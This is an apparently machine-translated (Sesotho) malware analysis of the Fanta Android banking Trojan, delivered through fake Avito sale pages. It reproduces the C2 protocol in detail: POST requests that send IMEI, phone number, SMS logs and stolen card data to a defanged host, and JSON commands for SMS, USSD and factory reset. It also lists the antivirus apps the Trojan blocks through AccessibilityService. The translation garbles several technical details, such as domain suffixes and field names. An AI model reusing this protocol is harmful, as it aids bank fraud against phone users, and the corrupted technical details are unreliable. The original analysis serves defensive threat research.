Ka letsatsi le leng u batla ho rekisa ho hong ho Avito mme, ha u se u kentse tlhaloso e qaqileng ea sehlahisoa sa hau (mohlala, module ea RAM), u tla fumana molaetsa ona:
Hang ha u bula sehokelo, u tla bona leqephe le bonahalang le se na molato le u tsebisang, morekisi ea thabileng le ea atlehileng, hore ho rekiloe:
Hang ha o tobetsa konopo ea "Tsoelapele", faele ea APK e nang le letšoao le lebitso le susumetsang tšepo e tla jarolleloa sesebelisoa sa hau sa Android. U kentse sesebelisoa seo ka mabaka a mang a kopileng litokelo tsa AccessibilityService, joale lifensetere tse 'maloa li ile tsa hlaha' me tsa nyamela kapele ... Ke phetho.
U ea hlahloba chelete ea hau, empa ka lebaka le itseng app ea hau ea banka e u botsa lintlha tsa karete ea hau hape. Kamora ho kenya data, ho etsahala ntho e mpe: ka lebaka le itseng o ntse o sa tsebe hantle, chelete e qala ho nyamela akhaonteng ea hau. U leka ho rarolla bothata, empa fono ea hau e hanela: e tobetsa linotlolo tsa "Back" le "Home", ha e khaotse ebile ha e u lumelle ho kenya ts'ebetsong mehato leha e le efe ea tšireletso. Ka lebaka leo, u sala u se na chelete, thepa ea hau ha e e-s'o rekoe, u ferekane 'me ua ipotsa: ho etsahetse'ng?
Karabo e bonolo: u fetohile phofu ea Fanta Android Trojan, setho sa lelapa la Flexnet. See se etsahetse joang? Ha re hlalose joale.
Bangoli: Andrey Polovinkin, setsebi se senyenyane sa tlhahlobo ea malware, Ivan Pisarev, setsebi sa tlhahlobo ea malware.
Lipalo-palo tse ling
Lelapa la Flexnet la Android Trojans le qalile ho tsejoa morao koana ka 2015. Ka nako e telele ea ts'ebetso, lelapa le ile la atoloha ho li-subspecies tse 'maloa: Fanta, Limebot, Lipton, joalo-joalo. Trojan, hammoho le lisebelisoa tsa motheo tse amanang le eona, ha li eme li sa sisinyehe: merero e mecha ea ho aba e ntse e ntlafatsoa - molemong oa rona, maqephe a boleng bo phahameng a phishing a lebisitsoeng ho morekisi ea itseng, 'me baetsi ba Trojan ba latela mekhoa ea feshene. ho ngola ka kokoana-hloko - ho eketsa ts'ebetso e ncha e etsang hore ho khonehe ho utsoa chelete ka katleho ho lisebelisoa tse nang le tšoaetso le mekhoa ea ho itšireletsa.
Letšolo le hlalositsoeng sehloohong sena le lebisitsoe ho basebelisi ba tsoang Russia; palo e nyane ea lisebelisoa tse tšoaelitsoeng li ile tsa tlalehoa Ukraine, 'me tse fokolang haholo Kazakhstan le Belarus.
Le hoja Flexnet e se e le sebakeng sa Android Trojan ka lilemo tse fetang 4 hona joale 'me e ithutile ka botlalo ke bafuputsi ba bangata, e ntse e le boemong bo botle. Ho tloha ka Pherekhong 2019, ts'enyo e ka bang teng e feta li-ruble tse limilione tse 35 - mme sena ke sa matšolo a Russia feela. Ka 2015, mefuta e sa tšoaneng ea Trojan ena ea Android e ile ea rekisoa ka liforamu tse ka tlas'a lefatše, moo khoutu ea mohloli oa Trojan e nang le tlhaloso e qaqileng e ka fumanoang hape. Sena se bolela hore lipalo-palo tsa tšenyo e teng lefatšeng li tsoteha le ho feta. Ha se sesupo se sebe ho monna-moholo ea joalo, na ha ho joalo?
Ho tloha thekisong ho ea ho thetso
Joalokaha ho ka bonoa ho tsoa skrineng e hlahisitsoeng pejana ea leqephe la phishing bakeng sa ts'ebeletso ea Marang-rang bakeng sa ho romella lipapatso Avito, e ne e lokiselitsoe motho ea hlokofalitsoeng. Kamoo ho bonahalang kateng, bahlaseli ba sebelisa e 'ngoe ea li-parers tsa Avito, tse ntšang nomoro ea mohala le lebitso la morekisi, hammoho le tlhaloso ea sehlahisoa. Ka mor'a ho atolosa leqephe le ho lokisa faele ea APK, motho ea hlokofalitsoeng o romelloa SMS e nang le lebitso la hae le sehokelo sa leqephe la phishing le nang le tlhaloso ea sehlahisoa sa hae le chelete e fumanoang ho "thekiso" ea sehlahisoa. Ka ho tobetsa konopo, mosebelisi o fumana faele e mpe ea APK - Fanta.
Boithuto ba sebaka sa shcet491[.]ru se bonts'itse hore se fuoe li-server tsa Hostinger's DNS:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Faele ea sebaka sa domain e na le likenyo tse supang liaterese tsa IP 31.220.23[.]236, 31.220.23[.]243, le 31.220.23[.]235. Leha ho le joalo, rekoto ea mantlha ea lisebelisoa (Rekoto) e supa ho seva e nang le aterese ea IP 178.132.1[.]240.
IP address 178.132.1[.]240 e fumaneha Netherlands 'me ke ea moamoheli. WorldStream. Liaterese tsa IP 31.220.23[.]235, 31.220.23[.]236 le 31.220.23[.]243 li fumaneha UK 'me ke tsa seva e arolelanoang ea ho amohela HOSTINGER. E sebelisoa joalo ka sehatisi openprov-ru. Libaka tse latelang le tsona li rarollotsoe ho aterese ea IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Ho lokela ho hlokomeloa hore lihokelo ka sebopeho se latelang li ne li fumaneha hoo e ka bang libakeng tsohle:
http://(www.){0,1}<%domain%>/[0-9]{7}
Template ena e boetse e kenyelletsa sehokelo se tsoang ho molaetsa oa SMS. Ho itšetlehile ka boitsebiso ba histori, ho ile ha fumanoa hore sebaka se le seng se lumellana le lihlopha tse 'maloa tsa mohlala o hlalositsoeng ka holimo, o bontšang hore sebaka se le seng se sebelisetsoa ho aba Trojan ho bahlaseluoa ba' maloa.
Ha re etele pele hanyane: Trojan e jarollotsoeng ka sehokelo ho tsoa ho SMS e sebelisa aterese onuseseddohap[.]club. Sebaka sena se ngolisitsoe ka 2019-03-12, 'me ho qala ka 2019-04-29, lisebelisoa tsa APK li sebelisana le sebaka sena. Ho ipapisitsoe le data e fumanoeng ho VirusTotal, kakaretso ea lits'ebetso tse 109 li sebelisane le seva sena. Sebaka ka boeona se ile sa rarolla aterese ea IP 217.23.14[.]27, e fumanehang Netherlands ebile e le ea moamoheli WorldStream. E sebelisoa joalo ka sehatisi namecheap. Libaka li boetse li rarollehile atereseng ena ea IP bad-racoon[.] tlelabo (ho qala ho tloha 2018-09-25) le bad-racoon[.] phela (ho tloha 2018-10-25). Ka domain bad-racoon[.] tlelabo lifaele tse fetang 80 tsa APK tse hokahaneng le tsona bad-racoon[.] phela - tse fetang 100.
Ka kakaretso, tlhaselo e tsoela pele ka tsela e latelang:
Ke eng e tlas'a sekwahelo sa Fanta?
Joalo ka li-trojan tse ling tse ngata tsa Android, Fanta e khona ho bala le ho romella melaetsa ea SMS, ho etsa likopo tsa USSD, le ho hlahisa lifensetere tsa eona holim'a lits'ebetso (ho kenyeletsoa le tsa banka). Leha ho le joalo, pokello ea mesebetsi ea lelapa lena e fihlile: Fanta e ile ea qala ho e sebelisa AccessibilityService bakeng sa merero e fapaneng: ho bala litaba tsa litsebiso tse tsoang lits'ebetsong tse ling, ho thibela ho fumanoa le ho emisa ts'ebetso ea Trojan sesebelisoa se nang le tšoaetso, joalo-joalo. Fanta e sebetsa liphetolelong tsohle tsa Android tse seng tlase ho 4.4. Sehloohong sena re tla shebisisa mohlala o latelang oa Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Hang ka mora ho qala
Hang ka mor'a ho qala, Trojan e pata setšoantšo sa eona. Sesebelisoa se ka sebetsa feela haeba lebitso la sesebelisoa se tšoaelitsoeng le le sieo lethathamong:
- lenapaolo86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(lehare)
Cheke ena e etsoa ts'ebeletso e kholo ea Trojan - Tšebeletso e kholo. Ha e qala ka lekhetlo la pele, litlhophiso tsa tlhophiso ea sesebelisoa li qalisoa ho boleng ba kamehla (sebopeho sa ho boloka data ea tlhophiso le moelelo oa tsona o tla tšohloa hamorao), mme sesebelisoa se secha se nang le tšoaetso se ngolisitsoe ho seva sa taolo. Kopo ea HTTP POST e nang le mofuta oa molaetsa e tla romelloa ho seva ngodisa_bot le tlhahisoleseling mabapi le sesebelisoa se tšoaelitsoeng (mofuta oa Android, IMEI, nomoro ea mohala, lebitso la opareitara le khoutu ea naha eo opareitara e ngolisitsoeng ho eona). Aterese e sebetsa e le seva sa taolo hXXp://onuseseddohap[.]club/controller.php. Ho arabela, seva se romela molaetsa o nang le masimo bot_id, bot_pwd, seva - Sesebelisoa se boloka litekanyetso tsena e le liparamente tsa seva ea CnC. Paramethara seva boikhethelo haeba tšimo e sa amoheloa: Fanta e sebelisa aterese ea ngoliso - hXXp://onuseseddohap[.]club/controller.php. Mosebetsi oa ho fetola aterese ea CnC e ka sebelisoa ho rarolla mathata a mabeli: ho tsamaisa mojaro ka ho lekana pakeng tsa li-server tse 'maloa (haeba ho na le lisebelisoa tse ngata tse nang le tšoaetso, mojaro ho seva sa marang-rang se sa sebetseng se ka ba holimo), hape le ho sebelisa. Seva e 'ngoe ha ho ka etsahala hore e 'ngoe ea li-server tsa CnC e hlolehe.
Haeba phoso e etsahala ha o romella kopo, Trojan e tla pheta mokhoa oa ho ngolisa ka mor'a metsotsoana e 20.
Hang ha sesebelisoa se ngolisitsoe ka katleho, Fanta e tla hlahisa molaetsa o latelang ho mosebelisi:
Keletso ea bohlokoa: tšebeletso e bitsoa Ts'ireletso ea Tsamaiso - lebitso la ts'ebeletso ea Trojan, 'me ka mor'a ho tobetsa konopo OK Fesetere e tla buloa ka litlhophiso tsa phihlello ea sesebelisoa se tšoaelitsoeng, moo mosebelisi a tlamehang ho fana ka litokelo tsa phihlello bakeng sa ts'ebeletso e mpe:
Hang ha mosebelisi a bulela AccessibilityService, Fanta e fumana litaba tse ka har'a lifensetere tsa ts'ebeliso le liketso tse entsoeng ho tsona:
Hang ka mor'a ho fumana litokelo tsa phihlello, Trojan e kopa litokelo le litokelo tsa batsamaisi ho bala litsebiso:
U sebelisa AccessibilityService, sesebelisoa se etsisa likonopo tsa senotlolo, ka hona se ipha litokelo tsohle tse hlokahalang.
Fanta e theha maemo a mangata a database (a tla hlalosoa hamorao) a hlokahalang ho boloka data ea tlhophiso, hammoho le tlhaiso-leseling e bokeletsoeng ts'ebetsong mabapi le sesebelisoa se tšoaelitsoeng. Ho romela tlhahisoleseding e bokelitsoeng, Trojan e etsa mosebetsi o pheta-phetoang o etselitsoeng ho lata masimo ho tswa ho database le ho amohela taelo ho tswa ho seva sa taolo. Nako ea ho fihlella CnC e behiloe ho latela mofuta oa Android: molemong oa 5.1, nako e tla ba metsotsoana e 10, ho seng joalo metsotsoana e 60.
Ho amohela taelo, Fanta e etsa kopo GetTask ho seva sa tsamaiso. Ho arabela, CnC e ka romela e 'ngoe ea litaelo tse latelang:
| sehlopha | tlhaloso |
|---|---|
| 0 | Romela molaetsa wa SMS |
| 1 | Etsa mohala kapa taelo ea USSD |
| 2 | E ntlafatsa paramethara nako |
| 3 | E ntlafatsa paramethara thibela |
| 6 | E ntlafatsa paramethara Motsamaisi oa sms |
| 9 | Qala ho bokella melaetsa ea SMS |
| 11 | Seta fono ya hao ho di-setting tsa feme |
| 12 | Numella/Thibela ho rengoa ha lifate tsa popo ea lebokose la puisano |
Fanta e boetse e bokella litemoso ho tsoa lits'ebetsong tse 70 tsa libanka, lits'ebetso tsa ho patala ka potlako le li-wallet le ho li boloka polokelong ea polokelo.
Ho boloka liparamente tsa tlhophiso
Ho boloka liparamente tsa tlhophiso, Fanta e sebelisa mokhoa o tloaelehileng oa sethala sa Android - Litlhahiso- lifaele. Li-setting li tla bolokoa faeleng e bitsoang Litlhophiso. Tlhaloso ea liparamente tse bolokiloeng e tafoleng e ka tlase.
| lebitso la | Boleng ba kamehla | Litekanyetso tse ka khonehang | tlhaloso |
|---|---|---|---|
| id | 0 | E kholo | Bot ID |
| seva | hXXp://onuseseddohap[.]club/ | URL | Laola aterese ea seva |
| pwd | - | khoele | Password ea seva |
| nako | 20 | E kholo | Nako ea nako. E bontša hore na mesebetsi e latelang e lokela ho chechisoa nako e kae:
|
| thibela | bohle | kaofela/teleNomoro | Haeba lebala le lekana le khoele bohle kapa telNumber, joale molaetsa oa SMS o amohetsoeng o tla amoheloa ke kopo mme o se ke oa bontšoa ho mosebelisi |
| Motsamaisi oa sms | 0 | 0/1 | Lumella/thibela sesebelisoa joalo ka moamoheli oa kamehla oa SMS |
| balaDialog | bohata | Nnete/ bohata | Numella/Thibela ho rengoa ha liketsahalo AccessibilityEvent |
Fanta e boetse e sebelisa faele Motsamaisi oa sms:
| lebitso la | Boleng ba kamehla | Litekanyetso tse ka khonehang | tlhaloso |
|---|---|---|---|
| pckg | - | khoele | Lebitso la taolo ea melaetsa ea SMS e sebelisitsoeng |
Tšebelisano le li-database
Nakong ea ts'ebetso ea eona, Trojan e sebelisa li-database tse peli. Database e reheletsoeng a se sebedisoang ho boloka tlhahisoleseding e fapaneng e bokeletsoeng fonong. Database ea bobeli e bitsoa fanta.db mme e sebelisoa ho boloka litlhophiso tse ikarabellang bakeng sa ho theha lifensetere tsa phishing tse etselitsoeng ho bokella tlhahisoleseling mabapi le likarete tsa banka.
Trojan e sebelisa database а ho boloka lintlha tse bokelletsoeng le ho ngola liketso tsa hau. Lintlha li bolokiloe tafoleng likutung. Ho theha tafole, sebelisa potso e latelang ea SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Database e na le lintlha tse latelang:
1. Ho kena ho qala ha sesebelisoa se nang le tšoaetso ka molaetsa Mohala o ile oa bulela!
2. Litsebiso tse tsoang lits'ebetsong. Molaetsa o hlahisoa ho latela template e latelang:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Lintlha tsa karete ea banka ho tsoa ho liforomo tsa phishing tse entsoeng ke Trojan. Paramethara VIEW_NAME e ka ba e 'ngoe ea tse latelang:
- AliExpress
- Avito
- Google Play
- Tse fapaneng <%App Name%>
Molaetsa o kentsoe ka sebopeho:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Melaetsa ea SMS e kenang/e tsoang ka sebopeho:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Tlhahisoleseding mabapi le sephutheloana se bopang lebokose la puisano ka sebopeho:
(<%Package name%>)<%Package information%>
Tafole ea mohlala likutung:
E 'ngoe ea mesebetsi ea Fanta ke pokello ea lintlha tse mabapi le likarete tsa banka. Pokello ea data e etsahala ka ho theha lifensetere tsa phishing ha o bula lits'ebetso tsa banka. Trojan e theha fensetere ea phishing hang feela. Tlhahisoleseding eo fensetere e bontshitsweng mosebedisi e bolokoa tafoleng Litlhophiso polokelongtshedimosetso fanta.db. Ho theha database, sebelisa potso e latelang ea SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Libaka tsohle tsa litafole Litlhophiso ka kamehla e qalisoa ho 1 (etsa fensetere ea phishing). Ka mor'a hore mosebeletsi a kenye lintlha tsa bona, boleng bo tla behoa ho 0. Mohlala oa masimo a tafole Litlhophiso:
- ka_kena - lebala le na le boikarabello ba ho hlahisa foromo ha o bula kopo ea banka
- pele_banka - ha e sebelisoe
- can_avito - tšimo e ikarabella bakeng sa ho hlahisa foromo ha u bula kopo ea Avito
- ka_ali - lebala le na le boikarabello ba ho hlahisa foromo ha u bula sesebelisoa sa Aliexpress
- e ka_e 'ngoe - lebala le na le boikarabello ba ho hlahisa foromo ha u bula kopo efe kapa efe lethathamong: Yula, Pandao, Drom Auto, Wallet. Likarete tsa theolelo le bonase, Aviasales, Booking, Trivago
- ka_karete — lebala le na le boikarabello ba ho hlahisa foromo ha e bula Google Play
Tšebelisano le seva sa tsamaiso
Tšebelisano ea marang-rang le seva sa tsamaiso e etsahala ka protocol ea HTTP. Ho sebetsa le marang-rang, Fanta e sebelisa laebrari e tsebahalang ea Retrofit. Likopo li romelloa ho: hXXp://onuseseddohap[.]club/controller.php. Aterese ea seva e ka fetoloa ha u ingolisa ho seva. Li-cookie li ka romelloa ka karabo ho tsoa ho seva. Fanta e etsa likopo tse latelang ho seva:
- Ngoliso ea bot ho seva sa taolo e etsahala hang, ha e qala ho qala. Lintlha tse latelang mabapi le sesebelisoa se tšoaelitsoeng li romelloa ho sebatli:
· Cookie - li-cookies tse amohetsoeng ho tsoa ho seva (boleng ba kamehla ke khoele e se nang letho)
· screen reader mode - khoele kamehla ngodisa_bot
· sehlongwapele - palo e sa fetoheng 2
· mofuta_sdk - e entsoe ho latela template e latelang: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI ea sesebelisoa se tšoaelitsoeng
· naheng — khoutu ea naha eo opareitara e ngolisitsoeng ho eona, ka sebopeho sa ISO
· palo - nomoro ea mohala
· opareitara — lebitso la opareitaraMohlala oa kopo e rometsoeng ho seva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Ho arabela kopo, sebatli se tlameha ho khutlisa ntho ea JSON e nang le lintlha tse latelang:
· bot_id - ID ea sesebelisoa se tšoaelitsoeng. Haeba bot_id e lekana le 0, Fanta e tla etsa kopo hape.
bot_pwd — phasewete bakeng sa seva.
seva — aterese ea seva. Khetho ea parameter. Haeba parameter e sa hlalosoa, aterese e bolokiloeng ts'ebetsong e tla sebelisoa.Mohlala oa ntho ea JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Kopa ho fumana taelo ho tsoa ho seva. Lintlha tse latelang li romelloa ho seva:
· Cookie — li-cookies li amohetsoe ho tsoa ho seva
· tefiso - id ea sesebelisoa se tšoaelitsoeng se ileng sa amoheloa ha ho romela kopo ngodisa_bot
· pwd - password bakeng sa seva
· divice_admin - tšimo e etsa qeto ea hore na litokelo tsa batsamaisi li fumanoe. Haeba litokelo tsa batsamaisi li fumanoe, tšimo e lekana le 1, ho seng joalo 0
· phihlelleho - Boemo ba tshebetso ya Tshebeletso ya phihlello. Haeba tšebeletso e qalile, boleng ke 1, ho seng joalo 0
· Motsamaisi oa SMS — e bonts'a hore na Trojan e nolofalitsoe joalo ka ts'ebeliso ea kamehla ea ho amohela SMS
· skrine — e bontsha hore na skrine e maemong afe. Boleng bo tla beoa 1, haeba skrine e buletsoe, ho seng joalo 0;Mohlala oa kopo e rometsoeng ho seva:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Ho ipapisitse le taelo, seva e ka khutlisa ntho ea JSON ka li-parameter tse fapaneng:
· sehlopha Romela molaetsa wa SMS: Litekanyetso li na le nomoro ea mohala, mongolo oa molaetsa oa SMS le ID ea molaetsa o rometsoeng. Identifi e sebelisoa ha o romela molaetsa ho seva ka mofuta setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· sehlopha Etsa mohala kapa taelo ea USSD: Nomoro ea mohala kapa taelo e tla 'meleng oa karabo.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· sehlopha Fetola parameter ea nako.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· sehlopha Fetola paramente ea intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· sehlopha Fetola sebaka sa SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· sehlopha Bokella melaetsa ea SMS ho sesebelisoa se nang le tšoaetso.
{ "response": [ { "mode": 9 } ], "status":"ok" }· sehlopha Seta fono ya hao ho di-setting tsa feme:
{ "response": [ { "mode": 11 } ], "status":"ok" }· sehlopha Fetola paramethara ea ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Ho romella molaetsa ka mofuta setSmsStatus. Kopo ena e etsoa ka mor'a hore taelo e phethoe Romela molaetsa wa SMS. Kopo e shebahala tjena:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Ho kenya litaba tsa database. Mola o le mong o fetisoa ka kopo ka 'ngoe. Lintlha tse latelang li romelloa ho seva:
· Cookie — li-cookies li amohetsoe ho tsoa ho seva
· screen reader mode - khoele kamehla setSaveInboxSms
· tefiso - id ea sesebelisoa se tšoaelitsoeng se ileng sa amoheloa ha ho romela kopo ngodisa_bot
· mongolo - mongolo ho rekoto ea database ea hajoale (sebaka d ho tloha tafoleng likutung polokelongtshedimosetso а)
· palo - Lebitso la rekoto ea hajoale ea database (sebaka p ho tloha tafoleng likutung polokelongtshedimosetso а)
· sms_mode - boleng bo felletseng (sebaka m ho tloha tafoleng likutung polokelongtshedimosetso а)Kopo e shebahala tjena:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Haeba ka katleho e rometsoe ho seva, mola o tla hlakoloa tafoleng. Mohlala oa ntho ea JSON e khutlisitsoeng ke seva:
{ "response":[], "status":"ok" }
Ho sebelisana le AccessibilityService
AccessibilityService e kentsoe tšebetsong ho nolofaletsa lisebelisoa tsa Android ho batho ba nang le bokooa. Maemong a mangata, tšebelisano ea 'mele ea hlokahala ho sebelisana le kopo. AccessibilityService e u lumella ho li etsa ka lenaneo. Fanta e sebelisa ts'ebeletso ho theha lifensetere tsa fake lits'ebetsong tsa banka le ho thibela basebelisi ho bula litlhophiso tsa sistimi le lits'ebetso tse ling.
E sebelisa ts'ebetso ea AccessibilityService, Trojan e shebella liphetoho ho likarolo tse skrineng sa sesebelisoa se tšoaelitsoeng. Joalokaha ho hlalositsoe pejana, litlhophiso tsa Fanta li na le paramente e ikarabellang bakeng sa ts'ebetso ea ho rema lifate ka mabokose a puisano - balaDialog. Haeba parameter ena e behiloe, tlhahisoleseding e mabapi le lebitso le tlhaloso ea sephutheloana se bakileng ketsahalo e tla kenngoa ho database. Trojan e etsa liketso tse latelang ha liketsahalo li qala:
- E etsisa ho tobetsa linotlolo tsa morao le tsa lapeng maemong a latelang:
· haeba mosebelisi a batla ho qala sesebelisoa sa hae bocha
· haeba mosebelisi a batla ho hlakola sesebelisoa sa "Avito" kapa ho fetola litokelo tsa phihlello
· haeba ho buuoa ka kopo ea "Avito" leqepheng
· ha o bula sesebelisoa sa Google Play Protect
· ha u bula maqephe ka li-setting tsa AccessibilityService
· ha lebokose la puisano la Ts'ireletso ea Sistimi le hlaha
· ha u bula leqephe ka li-setting tsa "Draw over other app".
· ha u bula leqephe la "Likopo", "Khutlisa le ho seta botjha", "Reset data", "Reset setting", "Developer panel", "Special. menyetla”, “menyetla e khethehileng”, “Litokelo tse khethehileng”
· haeba ketsahalo e hlahisitsoe ke lits'ebetso tse itseng.Lenane la likopo
- kenh
- Master Lite
- Hloekisa beng
- Hloekileng Master bakeng sa x86 CPU
- Tsamaiso ea Tumello ea Kopo ea Meizu
- Tšireletso ea MIUI
- Hloekileng Master - Antivirus & Cache le Garbage Cleaner
- Taolo ea batsoali le GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Sehloeki sa Virus, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Antivirus ea Avast le ts'ireletso ea mahala ea 2019
- Mobile Security MegaFon
- Tšireletso ea AVG bakeng sa Xperia
- Mobile Security
- Malwarebytes Antivirus & Tšireletso
- Antivirus bakeng sa Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus bakeng sa Huawei tablet System Manager
- Ho fihlella ho Samsung
- Samsung Smart Manager
- Ts'ireletso Monghali
- Lebelo La Boemo
- Ngaka Web
- Sebaka sa Ts'ireletso sa Webosaete
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antiviru le Ts'ireletso ea Mobile
- Kaspersky Internet Security: Antivirus le Tšireletso
- Bophelo ba Battery ea Kaspersky: Saver & Booster
- Kaspersky Endpoint Security - tšireletso le tsamaiso
- AVG Antivirus mahala 2019 - Tšireletso bakeng sa Android
- Antivirus Android
- Norton Mobile Security le Antivirus
- Antivirus, firewall, VPN, ts'ireletso ea mobile
- Mobile Security: antivirus, VPN, ts'ireletso ea bosholu
- Antivirus bakeng sa Android
- Haeba tumello e kopuoa ha o romella molaetsa oa SMS ho nomoro e khuts'oane, Fanta e etsisa ho tobetsa lebokose la ho hlahloba Hopola khetho le konopo ho romella.
- Ha o leka ho tlosa litokelo tsa batsamaisi ho Trojan, e notlela skrine ea mohala.
- E thibela ho kenya balaoli ba bacha.
- Haeba sesebelisoa sa antivirus dr.web e hlokometse tšoso, Fanta e etsisa ho tobetsa konopo iphapanyetsa.
- Trojan e etsisa ho tobetsa konopo ea morao le ea lapeng haeba ketsahalo e hlahisitsoe ke ts'ebeliso Tlhokomelo ea Sesebelisoa sa Samsung.
- Fanta e theha lifensetere tsa phishing ka liforomo tsa ho kenya tlhahisoleseling mabapi le likarete tsa banka haeba kopo e tsoang lethathamong la lits'ebeletso tse fapaneng tsa Marang-rang tse ka bang 30 e ne e qalisoa. Har'a tsona: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, joalo-joalo.
Liforomo tsa Phishing
Fanta e sekaseka hore na ke lits'ebetso life tse sebetsang sesebelisoa se nang le tšoaetso. Haeba kopo ea thahasello e buletsoe, Trojan e bonts'a fensetere ea phishing holim'a tse ling kaofela, e leng mokhoa oa ho kenya tlhahisoleseding ea karete ea banka. Mosebelisi o tlameha ho kenya data e latelang:
- Nomoro ea karete
- Letsatsi la ho felloa ke nako ha karete
- CVV
- Lebitso la mong'a karete (eseng bakeng sa libanka tsohle)
Ho ipapisitse le ts'ebeliso e sebetsang, lifensetere tse fapaneng tsa phishing li tla hlahisoa. Ka tlaase ke mehlala ea e meng ea eona:
AliExpress:
Avito:
Bakeng sa lisebelisoa tse ling, mohlala. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Ho ne ho hlile ho le joang
Ka lehlohonolo, motho ea amohetseng molaetsa oa SMS o hlalositsoeng qalong ea sengoloa o ile a fetoha setsebi sa cybersecurity. Ka hona, phetolelo ea sebele, e seng ea motsamaisi e fapane le e boletsoeng pejana: motho o ile a fumana SMS e thahasellisang, ka mor'a moo a e fa sehlopha sa IB Threat Hunting Intelligence. Phello ea tlhaselo ke sehlooho sena. Qetello e monate, ho nepahetse? Leha ho le joalo, hase lipale tsohle tse qetellang ka katleho, 'me e le hore ea hau e se ke ea shebahala joaloka sehiloeng sa motsamaisi ka tahlehelo ea chelete, hangata ho lekane ho khomarela melao e latelang e hlalositsoeng ka nako e telele:
- se ke oa kenya lits'ebetso tsa sesebelisoa sa mohala se nang le Android OS ho tsoa mehloling efe kapa efe ntle le Google Play
- Ha o kenya kopo, ela hloko ka ho khetheha litokelo tse kōptjoang ke kopo
- ela hloko likeketso tsa lifaele tse jarollotsoeng
- kenya liapdeite tsa Android OS khafetsa
- u se ke ua etela mehloli e belaetsang 'me u se ke ua khoasolla lifaele ho tloha moo
- Se ke oa tobetsa likhokahano tse amoheloang melaetsa ea SMS.
Source: www.habr.com